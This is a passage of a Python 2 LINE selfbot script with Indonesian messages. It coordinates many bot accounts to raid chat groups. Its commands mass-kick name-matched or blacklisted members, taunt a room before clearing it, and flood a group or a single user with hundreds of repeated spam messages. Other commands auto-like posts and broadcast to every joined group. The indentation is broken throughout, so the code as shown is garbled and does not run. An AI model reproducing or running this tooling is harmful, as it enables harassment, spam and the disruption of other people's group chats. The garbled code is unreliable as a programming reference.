                    # used); the hand-rolled ranges here skipped the members at
                    # indices 100, 200, 300 and 400
                    for i in range(0, jml, 100):
                        mention2(msg.to, nama[i:i + 100])
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["Crot"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
                jml = len(nama)
                if jml > 500:
                    cl.sendText(msg.to, 'Member melebihi batas.')
                else:
                    # same chunked mention as "Abah" above, with the index-skipping
                    # ranges replaced by a single loop
                    for i in range(0, jml, 100):
                        mention2(msg.to, nama[i:i + 100])
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members\nCrot aw.. Muncrat...!!!"
cnt.to = msg.to
cl.sendMessage(cnt)
            #-------------Tag All Function End---------------#
            elif msg.text in ["Bot Like", "Bot like"]: # every bot likes the main account's posts
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
            #----------------Banned-User Kick Function Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagi????devil smile??")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
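                # "Kill" sweeps the current group and kicks every member whose mid
                # is in wait["blacklist"], spreading the kicks across randomly
                # chosen bot clients so no single account does all the work.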
            #----------------Banned-User Kick Function End----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
                    # a single getGroup call suffices; the original reassigned gs
                    # from every client and only the final value (k15's) was used
                    gs = k15.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
                            if target in Bots or target in admin:
                                pass
                            else:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
                                    print (msg.to, [target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
                    # a single getGroup call suffices; only the last of the original
                    # reassignments (k15's) ever took effect
                    gs = k15.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
                                    print (msg.to, [target])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
            #----------------Kick-Target Function Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
                gs = cl.getGroup(msg.to)  # gs was never fetched in this branch
                targets = []
                for s in gs.members:
                    if _name in s.displayName:
                        targets.append(s.mid)
                if targets == []:
                    cl.sendText(msg.to, "user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
                            print (msg.to, [target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Tajong " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Tajong ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam1.kickoutFromGroup(msg.to,[target])
                            print (msg.to, [target])
except:
satpam1.leaveGroup(msg.to)
                gs = cl.getGroup(msg.to)
                gs.preventJoinByTicket = True
                cl.updateGroup(gs)
            #----------------Kick-Target Function End----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
            #----------------Ban-Target Function Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
                    # a single getGroup call suffices; only the last of the original
                    # reassignments (k10's) ever took effect
                    gs = k10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
            #----------------Ban-Target Function End-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
            #----------------Unban-Target Function Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
                    # a single getGroup call suffices; only the last of the original
                    # reassignments (k10's) ever took effect
                    gs = k10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
            #----------------Unban-Target Function End-----------------------#
            #-------------Spam Function Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
            #-------------Spam Function End---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
k20.sendText(msg.to, "Target Spam, Done...!!!")
k9.sendText(msg.to, "Target Spam, Done...!!!")
k7.sendText(msg.to, "Target Spam, Done...!!!")
k15.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Mungkin")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k15.sendText(msg.to,jawaban)
k15.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
kk.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati???","Ida???","Uke???","Alyn???","Ikka???","Yunikey???","Qwenie???","Gendis???","Aryani???","Nindy???","Wina???","Dewi???","Ifah???")
jawaban = random.choice(jawab)
k7.sendText(msg.to,jawaban)
k7.sendText(msg.to,jawaban)
k7.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun???","Ahmad khan???","Hajir???","Dd???","Indra???","Jeong???","Yogi???","Ary???","Ucil???")
jawaban = random.choice(jawab)
k5.sendText(msg.to,jawaban)
k5.sendText(msg.to,jawaban)
k5.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
k3.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
k11.sendText(msg.to,jawaban)
k11.sendText(msg.to,jawaban)
k11.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
            #-------------Broadcast Function Start------------#
            elif "GBc " in msg.text: # broadcast to every group the bots have joined
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
                a = k5.getGroupIdsJoined()  # only the last of the original ten reassignments ever took effect
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
k1.sendText(taf, (bctxt))
k2.sendText(taf, (bctxt))
k3.sendText(taf, (bctxt))
k4.sendText(taf, (bctxt))
k5.sendText(taf, (bctxt))
            #-------------Single-Room Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
kc.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
k2.sendText(msg.to,(bctxt))
k12.sendText(msg.to,(bctxt))
k13.sendText(msg.to,(bctxt))
            #--------------Broadcast Function End-----------#
            elif msg.text in ["LG"]: # list joined groups
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
                for i in gids:
                    g = cl.getGroup(i)
                    h += "[•]%s Member\n" % (g.name + "??" + str(len(g.members)))
